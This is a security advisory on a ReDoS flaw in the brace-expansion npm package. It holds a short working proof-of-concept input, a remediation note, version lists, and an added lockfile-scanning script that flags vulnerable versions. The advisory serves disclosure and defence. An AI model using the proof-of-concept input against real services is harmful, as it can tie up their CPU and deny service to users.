brace-expansion

ReDoS

Severity: moderate

Overview

Affected versions of brace-expansion are vulnerable to a regular expression denial of service condition.

Proof of Concept

var expand = require('brace-expansion');
expand('{,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n}');

Remediation

Update to version 1.1.7 or later.
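One way to check a project against this remediation, as an added example that is not part of the original advisory: it scans a parsed package-lock.json for brace-expansion copies below 1.1.7, including nested ones pulled in by other packages. The sample lockfiles are constructed and the function names are hypothetical.

```javascript
// Added example: flag brace-expansion entries older than 1.1.7 in a parsed package-lock.json.
const FIXED = [1, 1, 7]; // first unaffected version listed in this advisory

// true = below 1.1.7, false = 1.1.7 or later, null = version string not parseable.
function isVulnerable(version) {
  const m = /^(\d+)\.(\d+)\.(\d+)/.exec(String(version));
  if (!m) return null;
  const parts = m.slice(1).map(Number);
  for (let i = 0; i < 3; i++) {
    if (parts[i] !== FIXED[i]) return parts[i] < FIXED[i];
  }
  return false;
}

// Returns every brace-expansion entry that is vulnerable or needs manual review.
function findVulnerable(lock) {
  const hits = [];
  const check = (path, version) => {
    const v = isVulnerable(version);
    if (v !== false) hits.push({ path, version, parsed: v !== null });
  };
  // lockfileVersion 2/3: flat "packages" map keyed by install path.
  for (const [key, meta] of Object.entries(lock.packages || {})) {
    if (key.endsWith('node_modules/brace-expansion')) check(key, meta.version);
  }
  // lockfileVersion 1: nested "dependencies" tree (skipped when "packages" exists).
  const walk = (deps, trail) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      const here = trail ? trail + ' > ' + name : name;
      if (name === 'brace-expansion') check(here, meta.version);
      walk(meta.dependencies, here);
    }
  };
  if (!lock.packages) walk(lock.dependencies, '');
  return hits;
}

// Constructed sample lockfiles (not taken from any real project).
const sampleV3 = { lockfileVersion: 3, packages: {
  'node_modules/brace-expansion': { version: '1.1.11' },
  'node_modules/old-glob/node_modules/brace-expansion': { version: '1.1.6' },
} };
const sampleV1 = { lockfileVersion: 1, dependencies: {
  minimatch: { version: '3.0.0', dependencies: { 'brace-expansion': { version: '1.0.1' } } },
  'brace-expansion': { version: '1.1.7' },
} };
console.log(findVulnerable(sampleV3), findVulnerable(sampleV1));
```

For a real project, pass `JSON.parse` of the lockfile contents to `findVulnerable`; entries reported with `parsed: false` need a manual look.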

Vulnerable versions

0.0.0    5 years ago
1.0.0    4 years ago
1.0.1    4 years ago
1.1.0    4 years ago
1.1.1    3 years ago
1.1.2    3 years ago
1.1.3    3 years ago
1.1.4    2 years ago
1.1.5    2 years ago
1.1.6    2 years ago

Unaffected versions

1.1.7    a year ago
1.1.8    a year ago
1.1.9    6 months ago
1.1.10   6 months ago
1.1.11   6 months ago

Advisory timeline

  1. Published
     Advisory published
     Apr 25th, 2017
  2. Reported
     Initial report by myvyang
     Apr 25th, 2017